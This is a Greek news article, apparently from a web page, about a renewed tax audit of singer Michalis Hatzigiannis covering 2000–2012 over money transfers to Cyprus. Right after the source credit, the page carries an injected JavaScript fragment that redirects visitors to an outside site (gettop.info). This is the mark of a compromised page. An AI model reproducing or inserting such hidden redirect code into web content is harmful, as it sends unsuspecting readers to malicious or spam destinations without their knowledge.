Ξανά στο στόχαστρο της εφορίας ο Μιχάλης Χατζηγιάννης

0
7

 

Στο στόχαστρο επανελέγχου από τις φορολογικές αρχές μπαίνουν όσοι έβγαλαν εμβάσματα στο εξωτερικό- ανάμεσά τους και ο Μιχάλης Χατζηγιάννης, που έτσι μπαίνει ξανά στο στόχαστρο των ελεγκτών, παρά τη δικαίωσή του από το Διοικητικό Εφετείο για το πρόστιμο των 3,7 εκατ. ευρώ που του είχε επιβληθεί για εμβάσματα ύψους 5,28 εκατ. ευρώ που είχε στείλει στην Κύπρο.

Η υπόθεση δεν έκλεισε με την απόφαση του Διοικητικού Εφετείου Αθηνών που τον δικαίωσε, όπως σημειώνει ανώτερο στέλεχος του υπουργείου Οικονομικών. Το ίδιο στέλεχος προσθέτει ότι η απόφαση του δικαστηρίου ανοίγει τον δρόμο για να επανελεγχθεί ο τραγουδιστής, όχι μόνο τα έτη 2010 – 2011 που έστειλε τα χρήματα στην Κύπρο αλλά και για την περίοδο 2000-2012.

Το όνομα του Μιχάλη Χατζηγιάννη εντοπίστηκε στη λίστα με τα 1.270.047 ΑΦΜ και οι ελεγκτές έχουν στα χέρια τους το CD με τις κινήσεις των τραπεζικών λογαριασμών του και τα εισοδήματά του.

Ο τραγουδιστής θα ελεγχθεί φορολογικά σε κάθε έτος από το 2000 έως το 2012 για όλες τις συναλλαγές που πραγματοποίησε μέσω των τραπεζικών του λογαριασμών και για τα εισοδήματα που δήλωσε στην εφορία τη συγκεκριμένη περίοδο.

Σε περίπτωση που δεν καταφέρει να δικαιολογήσει τα ποσά αυτά με βάση τα εισοδήματα που εμφάνισε στις φορολογικές δηλώσεις των οικονομικών ετών 2001-2013 καθώς και επικαλούμενος τυχόν άλλα νομίμως κτηθέντα την περίοδο 2000-2012 εισοδήματα τα οποία δεν ήταν υποχρεωμένος από το νόμο να συμπεριλάβει στις φορολογικές δηλώσεις, θα κληθεί να καταβάλει επιπλέον φόρους εισοδήματος και προσαυξήσεις για την αδικαιολόγητη προαύξηση της περιουσίας του.

Πηγή: must.com.cy setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here